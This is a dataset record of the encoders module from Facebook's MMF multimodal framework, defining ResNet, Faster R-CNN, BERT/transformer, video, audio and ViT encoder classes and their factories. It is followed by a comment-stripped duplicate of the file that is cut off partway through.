f725fa58d83ac3bdbfb6b9632641decaf448c44e | 29,514 | py | Python | mmf/modules/encoders.py | facebookresearch/pythia | 079740bee4b357a7b1b866d35e2f1fad6edba8a4 | [
"BSD-3-Clause"
] | 3,252 | 2018-07-27T02:32:24.000Z | 2020-05-07T17:54:46.000Z | mmf/modules/encoders.py | facebookresearch/pythia | 079740bee4b357a7b1b866d35e2f1fad6edba8a4 | [
"BSD-3-Clause"
] | 209 | 2018-07-30T06:39:59.000Z | 2020-05-04T22:03:48.000Z | mmf/modules/encoders.py | facebookresearch/pythia | 079740bee4b357a7b1b866d35e2f1fad6edba8a4 | [
"BSD-3-Clause"
] | 431 | 2018-07-27T04:17:37.000Z | 2020-05-05T13:58:02.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
import importlib
import logging
import os
import pickle
import re
from collections import OrderedDict
from copy import deepcopy
from dataclasses import asdict, dataclass
from enum import Enum
from typing import Any
import torch
import torchvision
from mmf.common.registry import registry
from mmf.models.frcnn import GeneralizedRCNN
from mmf.modules.embeddings import ProjectionEmbedding, TextEmbedding
from mmf.modules.hf_layers import BertModelJit
from mmf.modules.layers import Identity
from mmf.utils.build import build_image_encoder, build_text_encoder
from mmf.utils.download import download_pretrained_model
from mmf.utils.file_io import PathManager
from mmf.utils.general import get_absolute_path
from mmf.utils.logger import log_class_usage
from omegaconf import MISSING, OmegaConf
from torch import nn, Tensor
from transformers.configuration_auto import AutoConfig
from transformers.modeling_auto import AutoModel
try:
from detectron2.modeling import build_resnet_backbone, ShapeSpec
except ImportError:
pass
logger = logging.getLogger()
class Encoder(nn.Module):
    """Base class for all MMF encoders.

    Subclasses declare a nested dataclass ``Config`` and accept an
    instance of it as their constructor argument.
    """

    @dataclass
    class Config:
        name: str = MISSING

    def __init__(self):
        super().__init__()
        # Record usage of the concrete subclass for telemetry/logging.
        log_class_usage("Encoder", self.__class__)

    @classmethod
    def from_params(cls, **kwargs):
        """Build the encoder from keyword params structured into ``cls.Config``."""
        structured_config = OmegaConf.structured(cls.Config(**kwargs))
        return cls(structured_config)
class EncoderFactory(nn.Module):
    """Base class for factories that build a concrete :class:`Encoder`
    from a typed config (a ``type`` discriminator plus the ``params``
    forwarded to the selected encoder)."""

    @dataclass
    class Config:
        # Discriminator naming the concrete encoder to construct.
        type: str = MISSING
        # Config object forwarded to the selected encoder's constructor.
        params: Encoder.Config = MISSING
class ImageFeatureEncoderTypes(Enum):
    """Encoder types accepted by :class:`ImageFeatureEncoderFactory`.

    Values match the string keys the factory dispatches on.
    """

    default = "default"
    identity = "identity"
    projection = "projection"
    frcnn_fc7 = "finetune_faster_rcnn_fpn_fc7"
class ImageFeatureEncoder(Encoder):
    """Base class for encoders operating on precomputed image feature
    vectors (as opposed to raw pixels); see ImageFeatureEncoderFactory."""

    @dataclass
    class Config(Encoder.Config):
        # Dimensionality of the incoming feature vectors; must be provided.
        in_dim: int = MISSING
class ImageFeatureEncoderFactory(EncoderFactory):
    """Factory building an encoder for precomputed image features.

    Dispatches on ``config.type`` and exposes the built module's
    ``out_dim`` for downstream layers.
    """

    @dataclass
    class Config(EncoderFactory.Config):
        type: ImageFeatureEncoderTypes = MISSING
        params: ImageFeatureEncoder.Config = MISSING

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        encoder_type = config.type
        # Accept either the enum member or its raw string value.
        if isinstance(encoder_type, ImageFeatureEncoderTypes):
            encoder_type = encoder_type.value

        assert (
            "in_dim" in config.params
        ), "ImageFeatureEncoder require 'in_dim' param in config"
        params = config.params

        if encoder_type in ("default", "identity"):
            # Pass-through: features are already in their final form.
            module = Identity()
            module.in_dim = params.in_dim
            module.out_dim = params.in_dim
        elif encoder_type == "projection":
            if "module" not in params:
                # Default the projection flavour without mutating the
                # caller's config object.
                params = deepcopy(params)
                params.module = "linear"
            module = ProjectionEmbedding(**params)
        elif encoder_type == "finetune_faster_rcnn_fpn_fc7":
            module = FinetuneFasterRcnnFpnFc7(params)
        else:
            raise NotImplementedError("Unknown Image Encoder: %s" % encoder_type)

        self.module = module
        self.out_dim = self.module.out_dim

    def forward(self, *args, **kwargs):
        """Delegate to the underlying encoder module."""
        return self.module(*args, **kwargs)
@registry.register_encoder("finetune_faster_rcnn_fpn_fc7")
class FinetuneFasterRcnnFpnFc7(ImageFeatureEncoder):
    """Linear fc7 head finetuned on top of Faster R-CNN features.

    Loads pickled fc7 weight/bias matrices (downloading pretrained
    detectron weights when the configured files are missing) and applies
    ``relu(W x + b)`` to the input features.
    """

    @dataclass
    class Config(ImageFeatureEncoder.Config):
        name: str = "finetune_faster_rcnn_fpn_fc7"
        in_dim: int = MISSING
        weights_file: str = "fc7_w.pkl"
        bias_file: str = "fc7_b.pkl"
        model_data_dir: str = MISSING

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        model_data_dir = get_absolute_path(config.model_data_dir)

        # Bug fix: the originals were only assigned when the configured
        # paths were relative, so an absolute weights/bias path raised
        # NameError at the PathManager.exists() check below.
        weights_file = config.weights_file
        if not os.path.isabs(weights_file):
            weights_file = os.path.join(model_data_dir, weights_file)
        bias_file = config.bias_file
        if not os.path.isabs(bias_file):
            bias_file = os.path.join(model_data_dir, bias_file)

        # Fall back to the pretrained detectron weights if either file
        # is missing locally.
        if not PathManager.exists(bias_file) or not PathManager.exists(weights_file):
            download_path = download_pretrained_model("detectron.vmb_weights")
            weights_file = get_absolute_path(os.path.join(download_path, "fc7_w.pkl"))
            bias_file = get_absolute_path(os.path.join(download_path, "fc7_b.pkl"))

        # NOTE: pickle.load on downloaded artifacts — files come from the
        # pretrained-model distribution channel, which must be trusted.
        with PathManager.open(weights_file, "rb") as w:
            weights = pickle.load(w)
        with PathManager.open(bias_file, "rb") as b:
            bias = pickle.load(b)
        out_dim = bias.shape[0]

        self.lc = nn.Linear(config.in_dim, out_dim)
        self.lc.weight.data.copy_(torch.from_numpy(weights))
        self.lc.bias.data.copy_(torch.from_numpy(bias))
        self.out_dim = out_dim

    def _load_from_state_dict(
        self,
        state_dict,
        prefix,
        local_metadata,
        strict,
        missing_keys,
        unexpected_keys,
        error_msgs,
    ):
        """Remap legacy checkpoints that stored the layer under a
        ``module.`` sub-prefix before delegating to the default loader."""
        old_prefix = prefix + "module."
        for k in list(state_dict.keys()):
            if k.startswith(old_prefix):
                new_k = k.replace(old_prefix, prefix)
                state_dict[new_k] = state_dict.pop(k)

        super()._load_from_state_dict(
            state_dict,
            prefix,
            local_metadata,
            strict,
            missing_keys,
            unexpected_keys,
            error_msgs,
        )

    def forward(self, image):
        """Apply the finetuned fc7 layer: ``relu(lc(image))``."""
        return nn.functional.relu(self.lc(image))
@registry.register_encoder("identity")
class IdentityEncoder(Encoder):
    """Encoder that returns its input unchanged (a no-op passthrough)."""

    @dataclass
    class Config(Encoder.Config):
        name: str = "identity"
        # Arbitrary default dimensionality used when none is configured.
        in_dim: int = 100

    def __init__(self, config: Config):
        super().__init__()
        self.module = nn.Identity()
        dim = config.get("in_dim", 100)
        self.in_dim = dim
        self.out_dim = dim

    def forward(self, x):
        """Return ``x`` unchanged."""
        return self.module(x)
class ImageEncoderTypes(Enum):
    """Encoder types accepted by :class:`ImageEncoderFactory`.

    Values match the string keys the factory dispatches on.
    """

    default = "default"
    identity = "identity"
    torchvision_resnet = "torchvision_resnet"
    resnet152 = "resnet152"
    detectron2_resnet = "detectron2_resnet"
    # Consistency fix: ImageEncoderFactory also dispatches on "frcnn",
    # but the enum had no member for it, so typed configs could not
    # select that encoder.
    frcnn = "frcnn"
class ImageEncoderFactory(EncoderFactory):
    """Factory building an encoder that maps raw images to features."""

    @dataclass
    class Config(EncoderFactory.Config):
        type: ImageEncoderTypes = MISSING

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self._type = config.type
        # Accept either the enum member or its raw string value.
        if isinstance(self._type, ImageEncoderTypes):
            self._type = self._type.value

        params = config.params
        if self._type in ("default", "identity"):
            # Pass-through module; report the input dim as the output dim.
            self.module = nn.Identity()
            self.module.out_dim = params.in_dim
        elif self._type == "resnet152":
            self.module = ResNet152ImageEncoder(params)
        elif self._type == "torchvision_resnet":
            self.module = TorchvisionResNetImageEncoder(params)
        elif self._type == "detectron2_resnet":
            self.module = Detectron2ResnetImageEncoder(params)
        elif self._type == "frcnn":
            self.module = FRCNNImageEncoder(params)
        else:
            raise NotImplementedError("Unknown Image Encoder: %s" % self._type)

    @property
    def out_dim(self):
        """Output feature dimensionality of the wrapped encoder."""
        return self.module.out_dim

    def forward(self, image):
        """Encode a batch of images with the selected backbone."""
        return self.module(image)
# Taken from facebookresearch/mmbt with some modifications
@registry.register_encoder("resnet152")
class ResNet152ImageEncoder(Encoder):
    """ResNet-152 trunk that pools conv features into N 2048-d vectors.

    Output shape is B x num_output_features x 2048 (or the raw
    B x 2048 x 7 x 7 map flattened when num_output_features == -1).
    """

    @dataclass
    class Config(Encoder.Config):
        name: str = "resnet152"
        pretrained: bool = True
        # "avg" or "adaptive"
        pool_type: str = "avg"
        num_output_features: int = 1

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        model = torchvision.models.resnet152(pretrained=config.get("pretrained", True))
        # Drop the final avgpool + fc so the Bx2048x7x7 feature map is kept.
        modules = list(model.children())[:-2]
        self.model = nn.Sequential(*modules)
        pool_func = (
            nn.AdaptiveAvgPool2d if config.pool_type == "avg" else nn.AdaptiveMaxPool2d
        )
        # num_output_features -> adaptive pool output size (rows, cols).
        pool_sizes = {
            1: (1, 1),
            2: (2, 1),
            3: (3, 1),
            4: (2, 2),
            5: (5, 1),
            6: (3, 2),
            7: (7, 1),
            8: (4, 2),
            9: (3, 3),
        }
        n = config.num_output_features
        if n == -1:
            # -1 will keep the original feature size
            self.pool = nn.Identity()
        elif n in pool_sizes:
            self.pool = pool_func(pool_sizes[n])
        else:
            # Previously an unsupported value silently left self.pool unset
            # and only failed later inside forward(); fail fast instead.
            raise ValueError(
                f"Unsupported num_output_features: {n}. Expected -1 or 1..9."
            )
        self.out_dim = 2048

    def forward(self, x):
        # Bx3x224x224 -> Bx2048x7x7 -> Bx2048xN -> BxNx2048
        out = self.pool(self.model(x))
        out = torch.flatten(out, start_dim=2)
        out = out.transpose(1, 2).contiguous()
        return out  # BxNx2048
@registry.register_encoder("torchvision_resnet")
class TorchvisionResNetImageEncoder(Encoder):
    """Generic torchvision ResNet trunk with configurable output pooling.

    Weights come from torchvision ("supervised"), a local file path, or a
    PathManager URI via ``pretrained_model``. The legacy ``use_avgpool``
    flag is honored for backward compatibility with older configs.
    """

    @dataclass
    class Config(Encoder.Config):
        name: str = "resnet50"
        pretrained: bool = False
        zero_init_residual: bool = True
        num_output_features: int = -1
        pool_type: str = "avg"

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        model = getattr(torchvision.models, config.name)(
            pretrained=config.pretrained, zero_init_residual=config.zero_init_residual
        )
        # checks if use_avgpool exists to maintain the old logic
        self.use_avgpool = config.get("use_avgpool", None)
        if self.use_avgpool:  # use_avgpool is True
            config.num_output_features = 1
            config.pool_type = "avg"
        elif self.use_avgpool is False:  # use_avgpool is False
            config.num_output_features = -1
        if config.pretrained:
            model = self._load_pretrained(model, config)
        # Drop the final avgpool + fc; keep the convolutional trunk.
        modules = list(model.children())[:-2]
        self.model = nn.Sequential(*modules)
        self.pool = self._pool_func(config)
        self.out_dim = config.get("out_dim", 2048)

    def _load_pretrained(self, model, config: Config):
        """Load weights from torchvision, a local file, or a PathManager URI."""
        pretrained_model = config.get("pretrained_model", "supervised")
        if pretrained_model == "supervised":
            pass  # this is already loaded via torchvision using pretrained=True
        elif os.path.exists(pretrained_model):
            model.load_state_dict(torch.load(pretrained_model))
        else:
            try:
                with PathManager.open(pretrained_model, "rb") as f:
                    model.load_state_dict(
                        torch.load(f, map_location=lambda storage, loc: storage),
                        strict=False,
                    )
            except Exception:
                raise Exception(f"unknown pretrained ResNet model: {pretrained_model}")
        return model

    def _pool_func(self, config: Config):
        """Return the pooling layer implied by ``config.num_output_features``."""
        pool_func = (
            nn.AdaptiveAvgPool2d if config.pool_type == "avg" else nn.AdaptiveMaxPool2d
        )
        n = config.num_output_features
        # -1 will keep the original feature size
        if n == -1:
            return nn.Identity()
        # num_output_features -> adaptive pool output size (rows, cols).
        pool_sizes = {
            1: (1, 1),
            2: (2, 1),
            3: (3, 1),
            4: (2, 2),
            5: (5, 1),
            6: (3, 2),
            7: (7, 1),
            8: (4, 2),
            9: (3, 3),
        }
        if n not in pool_sizes:
            # Previously an unsupported value fell through and raised a
            # confusing UnboundLocalError; fail fast with a clear message.
            raise ValueError(
                f"Unsupported num_output_features: {n}. Expected -1 or 1..9."
            )
        return pool_func(pool_sizes[n])

    def forward(self, x):
        # B x 3 x 224 x 224 -> B x out_dim x 7 x 7
        out = self.pool(self.model(x))
        if self.use_avgpool is None:
            out = torch.flatten(out, start_dim=2)
            out = out.transpose(1, 2).contiguous()  # BxNxout_dim
        else:
            out = torch.flatten(out, start_dim=1)  # BxN*out_dim
        return out
@registry.register_encoder("detectron2_resnet")
class Detectron2ResnetImageEncoder(Encoder):
    """ResNet backbone built via detectron2; forward returns the ``res5`` map."""

    @dataclass
    class Config(Encoder.Config):
        name: str = "detectron2_resnet"
        pretrained: bool = True
        # URL of a detectron2 checkpoint; required when pretrained is True.
        pretrained_path: str = None

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        pretrained = config.get("pretrained", False)
        pretrained_path = config.get("pretrained_path", None)
        self.resnet = build_resnet_backbone(config, ShapeSpec(channels=3))
        if pretrained:
            state_dict = torch.hub.load_state_dict_from_url(
                pretrained_path, progress=False
            )
            new_state_dict = OrderedDict()
            replace_layer = {"backbone.": ""}
            # Checkpoint keys carry a "backbone." prefix; strip it so they
            # line up with this bare backbone module.
            for key, value in state_dict["model"].items():
                new_key = re.sub(
                    r"(backbone\.)", lambda x: replace_layer[x.groups()[0]], key
                )
                new_state_dict[new_key] = value
            self.resnet.load_state_dict(new_state_dict, strict=False)
        # NOTE(review): assumes the final stage emits 2048 channels (true for
        # ResNet-50/101/152 style backbones) — confirm for other configs.
        self.out_dim = 2048

    def forward(self, x):
        x = self.resnet(x)
        return x["res5"]
@registry.register_encoder("frcnn")
class FRCNNImageEncoder(Encoder):
    """Faster R-CNN feature extractor; always run in eval mode."""

    @dataclass
    class Config(Encoder.Config):
        name: str = "frcnn"
        pretrained: bool = True
        # Path to a checkpoint loadable by torch.load; required if pretrained.
        pretrained_path: str = None

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        pretrained = config.get("pretrained", False)
        pretrained_path = config.get("pretrained_path", None)
        self.frcnn = GeneralizedRCNN(config)
        if pretrained:
            state_dict = torch.load(pretrained_path)
            self.frcnn.load_state_dict(state_dict)
            # Frozen feature extractor: inference only, no finetuning here.
            self.frcnn.eval()

    def forward(
        self,
        x: torch.Tensor,
        sizes: torch.Tensor = None,
        scales_yx: torch.Tensor = None,
        padding: torch.Tensor = None,
        max_detections: int = 0,
        return_tensors: str = "pt",
    ):
        # All detection arguments are forwarded untouched to GeneralizedRCNN.
        x = self.frcnn(
            x,
            sizes,
            scales_yx=scales_yx,
            padding=padding,
            max_detections=max_detections,
            return_tensors=return_tensors,
        )
        return x
class TextEncoderTypes(Enum):
    """Valid values for ``TextEncoderFactory.Config.type``."""

    identity = "identity"
    transformer = "transformer"
    embedding = "embedding"
class TextEncoderFactory(EncoderFactory):
    """Builds the concrete text encoder named by ``config.type``."""

    @dataclass
    class Config(EncoderFactory.Config):
        # identity, transformer or embedding as of now
        type: TextEncoderTypes = MISSING
        params: Encoder.Config = MISSING

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self._type = config.type
        if isinstance(self._type, TextEncoderTypes):
            self._type = self._type.value
        if self._type == "identity":
            self.module = nn.Identity()
        elif self._type == "transformer":
            # Keep the wrapper alive on self._module, but expose the raw
            # HuggingFace model as self.module so callers get its outputs.
            self._module = TransformerEncoder(config.params)
            self.module = self._module.module
        elif self._type == "embedding":
            self.module = TextEmbeddingEncoder(config.params)
        else:
            raise NotImplementedError(f"Unknown Text Encoder {self._type}")

    def forward(self, *args, **kwargs):
        return self.module(*args, **kwargs)
@registry.register_encoder("text_embedding")
class TextEmbeddingEncoder(Encoder):
    """Embeds tokens and reduces them along the sequence axis."""

    @dataclass
    class Config(Encoder.Config):
        name: str = "text_embedding"
        operator: str = MISSING
        # Keeping this Any for now as this
        # needs a separate refactor PR.
        embedding_params: Any = MISSING

    def __init__(self, config: Config):
        super().__init__()
        self._operator = config.operator
        self._embedding_params = config.embedding_params
        self.module = TextEmbedding(
            self._embedding_params.type, **self._embedding_params.params
        )

    def forward(self, x):
        """Embed *x*, reduce by the configured operator, squeeze size-1 dims."""
        embedded = self.module(x)
        reducers = {
            "sum": lambda t: t.sum(dim=1),
            "concat": lambda t: torch.cat(t, dim=1),
            "mul": lambda t: torch.prod(t, dim=1),
        }
        reduce_fn = reducers.get(self._operator)
        if reduce_fn is not None:
            embedded = reduce_fn(embedded)
        # Unknown operators fall through: the raw embedding is returned.
        return embedded.squeeze()
@registry.register_encoder("transformer")
class TransformerEncoder(Encoder):
    """HuggingFace transformer encoder (BERT via a TorchScript-friendly Jit
    variant, anything else via AutoModel), with optional extra segment
    embeddings."""

    @dataclass
    class Config(Encoder.Config):
        name: str = "transformer"
        num_segments: int = 2
        bert_model_name: str = "bert-base-uncased"
        # Options below can be overridden to update the bert configuration used
        # to initialize the bert encoder. If some option is missing or
        # if you are using an encoder different then BERT, add extra parameters
        # by inheriting and extending this config
        # Those options will automatically override the options for your transformer
        # encoder's configuration. For e.g. vocab_size is missing here, just add
        # vocab_size: x to update the size of the vocabulary with which encoder is
        # initialized. If you update the default values, the transformer you
        # will get will be initialized from scratch.
        hidden_size: int = 768
        num_hidden_layers: int = 12
        num_attention_heads: int = 12
        output_attentions: bool = False
        output_hidden_states: bool = False
        random_init: bool = False

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        hf_params = {"config": self._build_encoder_config(config)}
        should_random_init = self.config.get("random_init", False)
        # For BERT models, initialize using Jit version
        if self.config.bert_model_name.startswith("bert-"):
            if should_random_init:
                self.module = BertModelJit(**hf_params)
            else:
                self.module = BertModelJit.from_pretrained(
                    self.config.bert_model_name, **hf_params
                )
        else:
            if should_random_init:
                self.module = AutoModel.from_config(**hf_params)
            else:
                self.module = AutoModel.from_pretrained(
                    self.config.bert_model_name, **hf_params
                )
        self.embeddings = self.module.embeddings
        # After construction, self.config becomes the HF model config; the
        # original MMF config is preserved on self.original_config.
        self.original_config = self.config
        self.config = self.module.config
        self._init_segment_embeddings()

    def _init_segment_embeddings(self):
        """Grow token-type embeddings to ``num_segments`` entries.

        The first two rows keep the pretrained values; additional rows are
        initialized to the mean of the pretrained rows.
        """
        if self.original_config.get("num_segments", None):
            num_segments = self.original_config.num_segments
            if hasattr(self.embeddings, "token_type_embeddings"):
                new_embeds = nn.Embedding(num_segments, self.config.hidden_size)
                new_embeds.weight.data[:2].copy_(
                    self.embeddings.token_type_embeddings.weight
                )
                for idx in range(2, num_segments - 1):
                    new_embeds.weight.data[idx].copy_(
                        self.embeddings.token_type_embeddings.weight.data.mean(dim=0)
                    )
                self.embeddings.token_type_embeddings = new_embeds

    def _build_encoder_config(self, config: Config):
        # All keys of the MMF config are passed through as HF config overrides.
        return AutoConfig.from_pretrained(
            config.bert_model_name, **OmegaConf.to_container(config)
        )

    def forward(self, *args, return_sequence=False, **kwargs) -> Tensor:
        # Only return pooled output
        output = self.module(*args, **kwargs)
        return output[0] if return_sequence else output[1]
class MultiModalEncoderBase(Encoder):
    """Base class bundling one text encoder and one modal (image) encoder."""

    __jit_unused_properties__ = ["encoder_config"]

    @dataclass
    class Config(Encoder.Config):
        # This actually is Union[ImageEncoderConfig, ImageFeatureEncoderConfig]
        modal_encoder: EncoderFactory.Config = ImageEncoderFactory.Config(
            type=ImageEncoderTypes.resnet152, params=ResNet152ImageEncoder.Config()
        )
        text_encoder: EncoderFactory.Config = TextEncoderFactory.Config(
            type=TextEncoderTypes.transformer, params=TransformerEncoder.Config()
        )
        # When True, precomputed features are fed directly to the modal side.
        direct_features_input: bool = False
        modal_hidden_size: int = 2048
        text_hidden_size: int = 768

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        self._modal_encoder_config = self.config.get("modal_encoder", None)
        self._is_direct_features_input = self.config.get("direct_features_input", False)
        self.build()
        self.modal_hidden_size = self.config.get("modal_hidden_size", None)
        self.text_hidden_size = self.config.get("text_hidden_size", None)

    def build(self):
        """Construct both encoders; cache the text encoder's config."""
        encoders = self._build_encoders(self.config)
        self.text_encoder, self.modal_encoder = encoders[0], encoders[1]
        self._encoder_config = None
        if self.text_encoder:
            self._encoder_config = self.text_encoder.config

    @property
    def encoder_config(self):
        return self._encoder_config

    def _build_encoders(self, config):
        # Either encoder may be absent from the config; return None for it.
        text_encoder = None
        if config.get("text_encoder", None):
            text_encoder = build_text_encoder(config.text_encoder)
        modal_encoder = None
        if config.get("modal_encoder", None):
            modal_encoder = self._build_modal_encoder(config.modal_encoder)
        return (text_encoder, modal_encoder)

    def _build_modal_encoder(self, config):
        return build_image_encoder(
            config, direct_features=self._is_direct_features_input
        )
class PooledEncoder(Encoder):
    """
    Standard pooled encoder class which takes in an input, encodes it with an encoder
    implemented and returned from `self.build_encoder` function, pools it based
    `pool_type` and `num_output_features` specified, flattens it and returns it
    back as a tensor.
    """

    @dataclass
    class Config(Encoder.Config):
        num_output_features: int = 1  # How many output features need to be returned.
        pool_type: str = "avg"  # type of pooling to apply "avg" | "adaptive"
        out_dim: int = MISSING  # size of out dim expected
        three_d: bool = False  # if input requires 3D pooling (for video)

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.encoder = self.build_encoder(config)
        pool_func = (
            nn.AdaptiveAvgPool2d if config.pool_type == "avg" else nn.AdaptiveMaxPool2d
        )
        params = (config.num_output_features, 1)
        if config.three_d:
            # Video features need a 3D (temporal) pooling variant.
            pool_func = (
                nn.AdaptiveAvgPool3d
                if config.pool_type == "avg"
                else nn.AdaptiveMaxPool3d
            )
            params = (config.num_output_features, 1, 1)
        # -1 will keep the original feature size
        if config.num_output_features == -1:
            self.pool = nn.Identity()
        else:
            self.pool = pool_func(params)
        self.out_dim = config.out_dim

    def build_encoder(self, config: Config, *args, **kwargs):
        """Build an encoder on whose output the pooling will be applied.

        Args:
            config (Config): Config parameter required to build the encoder.

        Raises:
            NotImplementedError: Not implemented by default.
        """
        raise NotImplementedError()

    def forward(self, x: Tensor) -> Tensor:
        # encode -> pool -> flatten spatial dims -> B x N x out_dim
        out = self.encoder(x)
        out = self.pool(out)
        out = torch.flatten(out, start_dim=2)
        out = out.transpose(1, 2).contiguous()
        return out
@registry.register_encoder("pytorchvideo")
class PytorchVideoEncoder(Encoder):
    """A thin wrapper around pytorchvideo models.

    This class is responsible for integrating pytorchvideo models as encoders.
    This class attempts to construct a pytorchvideo model from torch hub.
    If this fails for a random weight model, and pytorchvideo package is available,
    build the model with random weights from pytorchvideo.models.

    Config:
        name (str): Always 'pytorchvideo' Used for builder_encoder()
        random_init (bool): Flag to load pretrained weights
        model_name (str): Name of the pytorchvideo model to use
        drop_last_n_layers (int):
            <=0 value for the number of layers to drop off the end
        pooler_name (str): Name of pooler used on model output

    Raises:
        ImportError:
            The constructor raises an ImportError if pytorchvideo is not installed.
    """

    @dataclass
    class Config(Encoder.Config):
        name: str = "pytorchvideo"
        random_init: bool = False
        model_name: str = "slowfast_r50"
        drop_last_n_layers: int = -1
        pooler_name: str = "identity"

    PYTORCHVIDEO_REPO = "facebookresearch/pytorchvideo:main"

    def __init__(self, config: Config):
        super().__init__()
        # Merge user config over the dataclass defaults.
        config = OmegaConf.create({**asdict(self.Config()), **config})
        if config.random_init:
            params = dict(**OmegaConf.to_container(config))
            # Strip the keys owned by this wrapper; the remainder are
            # forwarded to the pytorchvideo model constructor.
            params = {
                k: v
                for k, v in params.items()
                if k not in PytorchVideoEncoder.Config().__dict__
            }
            try:
                model = torch.hub.load(
                    PytorchVideoEncoder.PYTORCHVIDEO_REPO,
                    model=config.model_name,
                    pretrained=False,
                    **params,
                )
            except BaseException as err:
                # torch.hub failed (e.g. no network): fall back to a local
                # pytorchvideo install if one exists, else re-raise.
                pytorchvideo_spec = importlib.util.find_spec("pytorchvideo")
                if pytorchvideo_spec is None:
                    raise err
                import pytorchvideo.models.hub as hub

                model_create_fn = getattr(hub, config.model_name)
                model = model_create_fn(pretrained=False, **params)
        else:
            # load weights from TorchHub
            model = torch.hub.load(
                PytorchVideoEncoder.PYTORCHVIDEO_REPO,
                model=config.model_name,
                pretrained=True,
            )
        encoder_list = []
        if config.drop_last_n_layers == 0:
            encoder_list += [model]
        else:
            modules_list = list(model.children())
            # Some hub models wrap everything in one container; unwrap it.
            if len(modules_list) == 1:
                modules_list = list(modules_list[0].children())
            modules = modules_list[: config.drop_last_n_layers]
            encoder_list += modules
        pooler = registry.get_pool_class(config.pooler_name)()
        encoder_list += [pooler]
        self.encoder = nn.Sequential(*encoder_list)

    def forward(self, *args, **kwargs):
        # pass along input to model
        # assumes caller obeys the dynamic model signature
        return self.encoder(*args, **kwargs)
@registry.register_encoder("r2plus1d_18")
class R2Plus1D18VideoEncoder(PooledEncoder):
    """
    R2Plus1D based video encoder. Returns back a tensor of dim 2048.
    By default, pretrained version is used.
    See https://arxiv.org/abs/1711.11248.
    """

    @dataclass
    class Config(PooledEncoder.Config):
        name: str = "r2plus1d_18"
        out_dim: int = 512  # out dim
        pretrained: bool = True  # if should use pretrained version or not
        three_d: bool = True

    def build_encoder(self, config: Config, *args, **kwargs):
        """Return torchvision's r2plus1d_18 without its pooling/classifier head."""
        backbone = torchvision.models.video.r2plus1d_18(
            pretrained=config.get("pretrained", True)
        )
        # Strip the trailing adaptive pool and fc layers; keep the conv trunk.
        trunk = list(backbone.children())[:-2]
        return nn.Sequential(*trunk)
@registry.register_encoder("resnet18_audio")
class ResNet18AudioEncoder(PooledEncoder):
    """
    Audio encoder based on ResNet18 used in various audio classification paper
    as a baseline. By default, not pretrained version is used.
    """

    @dataclass
    class Config(PooledEncoder.Config):
        name: str = "resnet18_audio"
        out_dim: int = 512
        pretrained: bool = False

    def build_encoder(self, config: Config, *args, **kwargs):
        """Return a ResNet18 trunk whose stem accepts 1-channel spectrograms."""
        backbone = torchvision.models.resnet18(pretrained=config.get("pretrained", False))
        # Replace the RGB stem with a single-channel conv for spectrogram input.
        backbone.conv1 = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)
        trunk = list(backbone.children())[:-2]
        return nn.Sequential(*trunk)
@registry.register_encoder("vit")
class ViTEncoder(Encoder):
    """Vision Transformer encoder backed by ``mmf.modules.vit.ViTModel``."""

    @dataclass
    class Config(Encoder.Config):
        name: str = "vit"
        # See https://huggingface.co/models?filter=vit for available options
        pretrained_model_name: str = "google/vit-base-patch16-224"
        random_init: bool = False
        gradient_checkpointing: bool = False

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        # from_config returns both the module and its resolved HF config.
        self.module, self.hf_config = self._model_class.from_config(config)
        self.embeddings = self.module.embeddings
        self.out_dim = self.hf_config.hidden_size

    @property
    def _model_class(self):
        # Imported lazily to avoid a hard dependency at module import time.
        from mmf.modules.vit import ViTModel

        return ViTModel

    def forward(self, *args, **kwargs):
        # Default to not returning hidden states unless the caller asks.
        if "output_hidden_states" not in kwargs:
            kwargs["output_hidden_states"] = False
        output = self.module(*args, **kwargs)
        return output["last_hidden_state"], output.get("hidden_states", None)
| 34.763251 | 88 | 0.630345 |
import importlib
import logging
import os
import pickle
import re
from collections import OrderedDict
from copy import deepcopy
from dataclasses import asdict, dataclass
from enum import Enum
from typing import Any
import torch
import torchvision
from mmf.common.registry import registry
from mmf.models.frcnn import GeneralizedRCNN
from mmf.modules.embeddings import ProjectionEmbedding, TextEmbedding
from mmf.modules.hf_layers import BertModelJit
from mmf.modules.layers import Identity
from mmf.utils.build import build_image_encoder, build_text_encoder
from mmf.utils.download import download_pretrained_model
from mmf.utils.file_io import PathManager
from mmf.utils.general import get_absolute_path
from mmf.utils.logger import log_class_usage
from omegaconf import MISSING, OmegaConf
from torch import nn, Tensor
from transformers.configuration_auto import AutoConfig
from transformers.modeling_auto import AutoModel
try:
from detectron2.modeling import build_resnet_backbone, ShapeSpec
except ImportError:
pass
logger = logging.getLogger()
class Encoder(nn.Module):
    """Base class for all MMF encoders; records class usage on construction."""

    @dataclass
    class Config:
        name: str = MISSING

    def __init__(self):
        super().__init__()
        log_class_usage("Encoder", self.__class__)

    @classmethod
    def from_params(cls, **kwargs):
        """Alternate constructor: build the encoder from keyword parameters."""
        config = OmegaConf.structured(cls.Config(**kwargs))
        return cls(config)
class EncoderFactory(nn.Module):
    """Base class for factories that select a concrete encoder by type."""

    @dataclass
    class Config:
        type: str = MISSING
        params: Encoder.Config = MISSING
class ImageFeatureEncoderTypes(Enum):
    """Valid values for ``ImageFeatureEncoderFactory.Config.type``."""

    default = "default"
    identity = "identity"
    projection = "projection"
    frcnn_fc7 = "finetune_faster_rcnn_fpn_fc7"
class ImageFeatureEncoder(Encoder):
    """Encoder over precomputed image features of width ``in_dim``."""

    @dataclass
    class Config(Encoder.Config):
        in_dim: int = MISSING
class ImageFeatureEncoderFactory(EncoderFactory):
    """Builds the concrete image *feature* encoder named by ``config.type``."""

    @dataclass
    class Config(EncoderFactory.Config):
        type: ImageFeatureEncoderTypes = MISSING
        params: ImageFeatureEncoder.Config = MISSING

    def __init__(self, config: Config, *args, **kwargs):
